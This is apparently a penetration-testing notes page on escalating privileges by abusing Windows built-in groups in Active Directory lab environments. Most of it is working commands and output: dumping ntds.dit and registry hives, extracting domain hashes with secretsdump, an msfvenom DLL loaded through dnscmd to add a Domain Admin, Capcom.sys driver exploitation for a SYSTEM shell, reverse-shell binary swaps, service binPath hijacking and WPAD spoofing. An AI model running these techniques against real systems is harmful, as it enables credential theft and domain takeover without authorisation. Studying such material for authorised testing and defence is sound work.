# Group Privileges [![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA) ## Dangerous Groups ``` whoami /groups ``` {% embed url="" %} ``` Hyper-V Administrators Print Operators Server Operators Backup Operators Event Log Readers DNS Admins ``` {% hint style="info" %} *Always run the command from an admin shell if possible, some privs can not be seen otherwse* {% endhint %} ## Build-in Groups {% embed url="" %} {% hint style="info" %} We should always check these groups and include a list of each group's members as an appendix in our report for the client to review and determine if access is still necessary. {% endhint %} | | | | | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------- | | [Backup Operators](https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups#bkmk-backupoperators) | [Event Log Readers](https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups#bkmk-eventlogreaders) | [DnsAdmins](https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups#bkmk-dnsadmins) | | [Hyper-V Administrators](https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups#bkmk-hypervadministrators) | [Print Operators](https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups#bkmk-printoperators) | [Server Operators](https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups#bkmk-serveroperators) | ## Backup Operators Check SeBackupPrivilege in [User Privileges](https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/windows/user-privileges) {% embed url="" %} ### Pre-compiled Tools {% embed url="" %} {% embed url="" %} ```powershell-session PS C:\htb> Import-Module .\SeBackupPrivilegeUtils.dll PS C:\htb> Import-Module .\SeBackupPrivilegeCmdLets.dll ``` SeBackupPrivilege ? ```powershell-session PS C:\htb> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======== SeMachineAccountPrivilege Add workstations to domain Disabled SeBackupPrivilege Back up files and directories Disabled SeRestorePrivilege Restore files and directories Disabled SeShutdownPrivilege Shut down the system Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled ``` or ```powershell-session PS C:\htb> Get-SeBackupPrivilege SeBackupPrivilege is disabled ``` ### Enable SeBackupPrivilege: `Set-SeBackupPrivilege` ```powershell-session PS C:\htb> Set-SeBackupPrivilege PS C:\htb> Get-SeBackupPrivilege SeBackupPrivilege is enabled ``` ### **Copying a Protected File** ```powershell-session PS C:\htb> cat 'C:\Confidential\2021 Contract.txt' cat : Access to the path 'C:\Confidential\2021 Contract.txt' is denied. At line:1 char:1 + cat 'C:\Confidential\2021 Contract.txt' + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : PermissionDenied: (C:\Confidential\2021 Contract.txt:String) [Get-Content], Unauthor izedAccessException + FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand ``` ```powershell-session PS C:\htb> Copy-FileSeBackupPrivilege 'C:\Confidential\2021 Contract.txt' .\Contract.txt Copied 88 bytes PS C:\htb> cat .\Contract.txt Inlanefreight 2021 Contract ============================== Board of Directors: <...SNIP...> ``` ### **Attacking a Domain Controller - Copying NTDS.dit** {% embed url="" %} This group also permits logging in locally to a domain controller. #### Diskshadow ``` PS C:\htb> diskshadow.exe Microsoft DiskShadow version 1.0 Copyright (C) 2013 Microsoft Corporation On computer: DC, 10/14/2020 12:57:52 AM DISKSHADOW> set verbose on DISKSHADOW> set metadata C:\Windows\Temp\meta.cab DISKSHADOW> set context clientaccessible DISKSHADOW> set context persistent DISKSHADOW> begin backup DISKSHADOW> add volume C: alias cdrive DISKSHADOW> create DISKSHADOW> expose %cdrive% E: DISKSHADOW> end backup DISKSHADOW> exit PS C:\htb> dir E: Directory: E:\ Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 5/6/2021 1:00 PM Confidential d----- 9/15/2018 12:19 AM PerfLogs d-r--- 3/24/2021 6:20 PM Program Files d----- 9/15/2018 2:06 AM Program Files (x86) d----- 5/6/2021 1:05 PM Tools d-r--- 5/6/2021 12:51 PM Users d----- 3/24/2021 6:38 PM Windows ``` Copy ntds.dit ``` PS C:\htb> Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit Copied 16777216 bytes ``` or with Robocopy ```cmd-session C:\htb> robocopy /B E:\Windows\NTDS .\ntds ntds.dit ``` ### **Backing up SAM and SYSTEM Registry Hives** ```cmd-session C:\htb> reg save HKLM\SYSTEM SYSTEM.SAV The operation completed successfully. C:\htb> reg save HKLM\SAM SAM.SAV The operation completed successfully. ``` ### Extract credentials * PowerShell `DSInternals` {% embed url="" %} {% embed url="" %} ```powershell-session PS C:\htb> Import-Module .\DSInternals.psd1 PS C:\htb> $key = Get-BootKey -SystemHivePath .\SYSTEM PS C:\htb> Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $key ``` * Secretsdump ```shell-session secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL ``` {% content-ref url="../../internal-pentest/ntds-secrets" %} [ntds-secrets](https://0xss0rz.gitbook.io/0xss0rz/pentest/internal-pentest/ntds-secrets) {% endcontent-ref %} {% embed url="" %} ### With NXC ``` nxc smb dc -u user -p pass -M backup_operator ```
### References {% embed url="" %} ## Event Log Readers ### **Confirming Group Membership** ```cmd-session C:\htb> net localgroup "Event Log Readers" Alias name Event Log Readers Comment Members of this group can read event logs from local machine Members ------------------------------------------------------------------------------- logger The command completed successfully. ``` ### **Searching Security Logs Using wevtutil** ```powershell-session PS C:\htb> wevtutil qe Security /rd:true /f:text | Select-String "/user" Process Command Line: net use T: \\fs01\backups /user:tim MyStr0ngP@ssword ``` ### **Passing Credentials to wevtutil** ```cmd-session C:\htb> wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user" ``` ### **Searching Security Logs Using Get-WinEvent** {% hint style="info" %} Note: Searching the `Security` event log with `Get-WInEvent` requires administrator access or permissions adjusted on the registry key `HKLM\System\CurrentControlSet\Services\Eventlog\Security`. Membership in just the `Event Log Readers` group is not sufficient. {% endhint %} ```powershell-session PS C:\htb> Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'} | Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }} CommandLine ----------- net use T: \\fs01\backups /user:tim MyStr0ngP@ssword ``` Can also be run as another user with the `-Credential` parameter. Other logs include [PowerShell Operational](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7.1) log, which may also contain sensitive information or credentials if script block or module logging is enabled. This log is accessible to unprivileged users. ## DnsAdmins ```powershell-session C:\htb> Get-ADGroupMember -Identity DnsAdmins distinguishedName : CN=netadm,CN=Users,DC=INLANEFREIGHT,DC=LOCAL name : netadm objectClass : user objectGUID : 1a1ac159-f364-4805-a4bb-7153051a8c14 SamAccountName : netadm SID : S-1-5-21-669053619-2741956077-1013132368-1109 ``` ### **Generating Malicious DLL** ```shell-session msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll ``` ### **Loading DLL as Member of DnsAdmins** {% hint style="info" %} *Note: We must specify the full path to our custom DLL or the attack will not work properly.* {% endhint %} ```cmd-session C:\htb> dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\Desktop\adduser.dll Registry property serverlevelplugindll successfully reset. Command completed successfully. ``` The DLL will be loaded the next time the DNS service is started. Membership in the DnsAdmins group doesn't give the ability to restart the DNS service, but this is conceivably something that sysadmins might permit DNS admins to do. **Finding User's SID** ```cmd-session C:\htb> wmic useraccount where name="netadm" get sid SID S-1-5-21-669053619-2741956077-1013132368-1109 ``` **Checking Permissions on DNS Service** ```cmd-session C:\htb> sc.exe sdshow DNS D:(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)(A;;RPWP;;;S-1-5-21-669053619-2741956077-1013132368-1109)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) ``` `RPWP` permissions which translate to `SERVICE_START` and `SERVICE_STOP`, respectively. **Stopping the DNS Service** ```cmd-session C:\htb> sc stop dns ``` **Starting the DNS Service** ```cmd-session C:\htb> sc start dns ``` **Confirming Group Membership** ```cmd-session C:\htb> net group "Domain Admins" /dom Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- Administrator netadm The command completed successfully. ``` Sign out using "Start" then log in back to apply the changes
#### Cleaning Up {% hint style="info" %} *Making configuration changes and stopping/restarting the DNS service on a Domain Controller are very destructive actions and must be exercised with great care. We should only carry out with explicit permission from and in coordination with our client.* {% endhint %} ```cmd-session C:\htb> reg query \\10.129.43.9\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters GlobalQueryBlockList REG_MULTI_SZ wpad\0isatap EnableGlobalQueryBlockList REG_DWORD 0x1 PreviousLocalHostname REG_SZ WINLPE-DC01.INLANEFREIGHT.LOCAL Forwarders REG_MULTI_SZ 1.1.1.1\08.8.8.8 ForwardingTimeout REG_DWORD 0x3 IsSlave REG_DWORD 0x0 BootMethod REG_DWORD 0x3 AdminConfigured REG_DWORD 0x1 ServerLevelPluginDll REG_SZ adduser.dll ``` ```cmd-session C:\htb> reg delete \\10.129.43.9\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll Delete the registry value ServerLevelPluginDll (Yes/No)? Y The operation completed successfully. ``` ```cmd-session C:\htb> sc.exe start dns ``` ### Using Mimilib.dll {% embed url="" %} Modifying the [kdns.c](https://github.com/gentilkiwi/mimikatz/blob/master/mimilib/kdns.c) file to execute a reverse shell one-liner ```c /* Benjamin DELPY `gentilkiwi` https://blog.gentilkiwi.com benjamin@gentilkiwi.com Licence : https://creativecommons.org/licenses/by/4.0/ */ #include "kdns.h" DWORD WINAPI kdns_DnsPluginInitialize(PLUGIN_ALLOCATOR_FUNCTION pDnsAllocateFunction, PLUGIN_FREE_FUNCTION pDnsFreeFunction) { return ERROR_SUCCESS; } DWORD WINAPI kdns_DnsPluginCleanup() { return ERROR_SUCCESS; } DWORD WINAPI kdns_DnsPluginQuery(PSTR pszQueryName, WORD wQueryType, PSTR pszRecordOwnerName, PDB_RECORD *ppDnsRecordListHead) { FILE * kdns_logfile; #pragma warning(push) #pragma warning(disable:4996) if(kdns_logfile = _wfopen(L"kiwidns.log", L"a")) #pragma warning(pop) { klog(kdns_logfile, L"%S (%hu)\n", pszQueryName, wQueryType); fclose(kdns_logfile); system("ENTER COMMAND HERE"); } return ERROR_SUCCESS; } ``` ### Creating a WPAD Record Use a tool such as [Responder](https://github.com/lgandx/Responder) or [Inveigh](https://github.com/Kevin-Robertson/Inveigh) to perform traffic spoofing, and attempt to capture password hashes and crack them offline or perform an SMBRelay attack #### **Disabling the Global Query Block List** ```powershell-session C:\htb> Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName dc01.inlanefreight.local ``` #### **Adding a WPAD Record p**ointing to our attack machine ```powershell-session C:\htb> Add-DnsServerResourceRecordA -Name wpad -ZoneName inlanefreight.local -ComputerName dc01.inlanefreight.local -IPv4Address 10.10.14.3 ``` ## Hyper-V Administrators If Domain Controllers have been virtualized, then the virtualization admins should be considered Domain Admins If the operating system is vulnerable to [CVE-2018-0952](https://www.tenable.com/cve/CVE-2018-0952) or [CVE-2019-0841](https://www.tenable.com/cve/CVE-2019-0841), we can leverage this to gain SYSTEM privileges. Otherwise, we can try to take advantage of an application on the server that has installed a service running in the context of SYSTEM, which is startable by unprivileged users, For exemple Firefox: {% embed url="" %} After running the PowerShell script, we should have full control of this file and can take ownership of it. ```cmd-session C:\htb> takeown /F C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe ``` Next, we can replace this file with a malicious `maintenanceservice.exe`, start the maintenance service, and get command execution as SYSTEM. ```cmd-session C:\htb> sc.exe start MozillaMaintenance ``` {% hint style="info" %} *Note: This vector has been mitigated by the March 2020 Windows security updates, which changed behavior relating to hard links.* {% endhint %} ## Print Operators `SeLoadDriverPrivilege` {% hint style="info" %} *From administrative command shell* {% endhint %} ```cmd-session C:\htb> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ================================== ========== SeMachineAccountPrivilege Add workstations to domain Disabled SeLoadDriverPrivilege Load and unload device drivers Disabled SeShutdownPrivilege Shut down the system Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled ``` The driver `Capcom.sys` contains functionality to allow any user to execute shellcode with SYSTEM privileges. {% embed url="" %} Download the poc locally and edit it, pasting over the includes below. ```c #include #include #include #include #include #include "tchar.h" ``` Next, from a Visual Studio 2019 Developer Command Prompt, compile it using **cl.exe**. Or use [pre-compiled tools](#pre-compiled-tools-1) ### **Compile with cl.exe** ```cmd-session C:\Users\mrb3n\Desktop\Print Operators>cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp Microsoft (R) C/C++ Optimizing Compiler Version 19.28.29913 for x86 Copyright (C) Microsoft Corporation. All rights reserved. EnableSeLoadDriverPrivilege.cpp Microsoft (R) Incremental Linker Version 14.28.29913.0 Copyright (C) Microsoft Corporation. All rights reserved. /out:EnableSeLoadDriverPrivilege.exe EnableSeLoadDriverPrivilege.obj ``` ### **Add Reference to Driver** Download the `Capcom.sys` driver from [here](https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys), and save it to `C:\temp`. Issue the commands below to add a reference to this driver under our HKEY\_CURRENT\_USER tree. ```cmd-session C:\htb> reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys" The operation completed successfully. C:\htb> reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1 The operation completed successfully. ``` ### **Verify Driver is not Loaded** {% embed url="" %} ```powershell-session PS C:\htb> .\DriverView.exe /stext drivers.txt PS C:\htb> cat drivers.txt | Select-String -pattern Capcom ``` ### **Verify Privilege is Enabled** ```cmd-session C:\htb> EnableSeLoadDriverPrivilege.exe whoami: INLANEFREIGHT0\printsvc whoami /priv SeMachineAccountPrivilege Disabled SeLoadDriverPrivilege Enabled SeShutdownPrivilege Disabled SeChangeNotifyPrivilege Enabled by default SeIncreaseWorkingSetPrivilege Disabled NTSTATUS: 00000000, WinError: 0 ``` ### **Verify Capcom Driver is Listed** ```powershell-session PS C:\htb> .\DriverView.exe /stext drivers.txt PS C:\htb> cat drivers.txt | Select-String -pattern Capcom Driver Name : Capcom.sys Filename : C:\Tools\Capcom.sys ``` ### **Use ExploitCapcom Tool to Escalate Privileges** {% embed url="" %} ```powershell-session PS C:\htb> .\ExploitCapcom.exe [*] Capcom.sys exploit [*] Capcom.sys handle was obained as 0000000000000070 [*] Shellcode was placed at 0000024822A50008 [+] Shellcode was executed [+] Token stealing was successful [+] The SYSTEM shell was launched ```
### Alternate Exploitation - No GUI Modify the `ExploitCapcom.cpp` code before compiling. Here we can edit line 292 and replace `"C:\\Windows\\system32\\cmd.exe"` with, say, a reverse shell binary created with `msfvenom`, for example: `c:\ProgramData\revshell.exe`. ```c // Launches a command shell process static bool LaunchShell() { TCHAR CommandLine[] = TEXT("C:\\Windows\\system32\\cmd.exe"); PROCESS_INFORMATION ProcessInfo; STARTUPINFO StartupInfo = { sizeof(StartupInfo) }; if (!CreateProcess(CommandLine, CommandLine, nullptr, nullptr, FALSE, CREATE_NEW_CONSOLE, nullptr, nullptr, &StartupInfo, &ProcessInfo)) { return false; } CloseHandle(ProcessInfo.hThread); CloseHandle(ProcessInfo.hProcess); return true; } ``` `CommandLine` string in this example would be changed to: ```c TCHAR CommandLine[] = TEXT("C:\\ProgramData\\revshell.exe"); ``` ### Automating the Steps {% embed url="" %} Automate the process of enabling the privilege, creating the registry key, and executing `NTLoadDriver` to load the driver ```cmd-session C:\htb> EoPLoadDriver.exe System\CurrentControlSet\Capcom c:\Tools\Capcom.sys [+] Enabling SeLoadDriverPrivilege [+] SeLoadDriverPrivilege Enabled [+] Loading Driver: \Registry\User\S-1-5-21-454284637-3659702366-2958135535-1103\System\CurrentControlSet\Capcom NTSTATUS: c000010e, WinError: 0 ``` Then run `ExploitCapcom.exe` to pop a SYSTEM shell or run our custom binary ### Clean up ```cmd-session C:\htb> reg delete HKCU\System\CurrentControlSet\Capcom Permanently delete the registry key HKEY_CURRENT_USER\System\CurrentControlSet\Capcom (Yes/No)? Yes The operation completed successfully. ``` ### Pre-compiled Tools {% embed url="" %} {% embed url="" %} ## Server Operators {% hint style="info" %} *It is a very highly privileged group that can log in locally to servers, including Domain Controllers. => Target the DC* {% endhint %} Membership of this group confers the powerful `SeBackupPrivilege` and `SeRestorePrivilege` privileges and the ability to control local services. ### **Querying the AppReadiness Service** ```cmd-session C:\htb> sc qc AppReadiness [SC] QueryServiceConfig SUCCESS SERVICE_NAME: AppReadiness TYPE : 20 WIN32_SHARE_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Windows\System32\svchost.exe -k AppReadiness -p LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : App Readiness DEPENDENCIES : SERVICE_START_NAME : LocalSystem ``` ### **Checking Service Permissions with PsService** {% embed url="" %} ```cmd-session C:\htb> c:\Tools\PsService.exe security AppReadiness PsService v2.25 - Service information and configuration utility Copyright (C) 2001-2010 Mark Russinovich Sysinternals - www.sysinternals.com SERVICE_NAME: AppReadiness DISPLAY_NAME: App Readiness ACCOUNT: LocalSystem SECURITY: [ALLOW] NT AUTHORITY\SYSTEM Query status Query Config Interrogate Enumerate Dependents Pause/Resume Start Stop User-Defined Control Read Permissions [ALLOW] BUILTIN\Administrators All [ALLOW] NT AUTHORITY\INTERACTIVE Query status Query Config Interrogate Enumerate Dependents User-Defined Control Read Permissions [ALLOW] NT AUTHORITY\SERVICE Query status Query Config Interrogate Enumerate Dependents User-Defined Control Read Permissions [ALLOW] BUILTIN\Server Operators All ``` ### **Checking Local Admin Group Membership** ```cmd-session C:\htb> net localgroup Administrators Alias name Administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator Domain Admins Enterprise Admins The command completed successfully. ``` Our target account is not present. ### **Modifying the Service Binary Path** Add our current user to the default local administrators group ```cmd-session C:\htb> sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add" [SC] ChangeServiceConfig SUCCESS ``` ### **Starting the Service** ```cmd-session C:\htb> sc start AppReadiness [SC] StartService FAILED 1053: The service did not respond to the start or control request in a timely fashion. ``` Starting the service fails, which is expected. But, if we check the membership of the administrators group, we see that the command was executed successfully. ```cmd-session C:\htb> net localgroup Administrators Alias name Administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator Domain Admins Enterprise Admins server_adm The command completed successfully. ``` Sign out using "Start" then log in back to apply the changes
### **Retrieving NTLM Password Hashes from the Domain Controller** ```shell-session $ secretsdump.py server_adm@10.129.43.9 -just-dc-user administrator Impacket v0.9.22.dev1+20200929.152157.fe642b24 - Copyright 2020 SecureAuth Corporation Password: [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:5db9c9ada113804443a8aeb64f500cd3e9670348719ce1436bcc95d1d93dad43 Administrator:aes128-cts-hmac-sha1-96:94c300d0e47775b407f2496a5cca1a0a Administrator:des-cbc-md5:d60dfbbf20548938 [*] Cleaning up... ``` ## “Network Configuration Operators” group Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2025-21293) {% embed url="" %} ## DHCP Administrators Group {% embed url="" %} {% embed url="" %} ``` dhcp_coerce.py -i IFACE -d DOMAIN_NAME -s TARGET_SERVER -c COERCE_IP -ip RELAY_IP ```
## Interesting Book {% content-ref url="../../../interesting-books" %} [interesting-books](https://0xss0rz.gitbook.io/0xss0rz/interesting-books) {% endcontent-ref %} {% hint style="info" %} ***Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.* {% endhint %} * [**Pentesting Active Directory and Windows-based Infrastructure**](https://www.amazon.fr/dp/1804611360?tag=0xss0rz-21)\ Enhance your skill set to pentest against real-world Microsoft infrastructure with hands-on exercises and by following attack/detect guidelines with OpSec considerations * [**Infrastructure Attack Strategies for Ethical Hacking**](https://www.amazon.fr/dp/8196994729?tag=0xss0rz-21)\ Encompassing both external and internal enumeration techniques, the book delves into attacking routers and services, establishing footholds, privilege escalation, lateral movement, and exploiting databases and Active Directory. * [**RTFM: Red Team Field Manual v2**](https://www.amazon.fr/dp/1075091837?tag=0xss0rz-21)\ A quick reference when there is no time to scour the Internet for that perfect command * [**Red Team Development and Operations: A practical guide**](https://www.amazon.fr/dp/B0842BMMCC?tag=0xss0rz-21)\ The authors have moved beyond SANS training and use this book to detail red team operations in a practical guide. * [**Cybersecurity Attacks – Red Team Strategies**](https://www.amazon.fr/dp/B0822G9PTM?tag=0xss0rz-21)\ A practical guide to building a penetration testing program having homefield advantage ## Support this Gitbook I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it. [![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA) [![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz)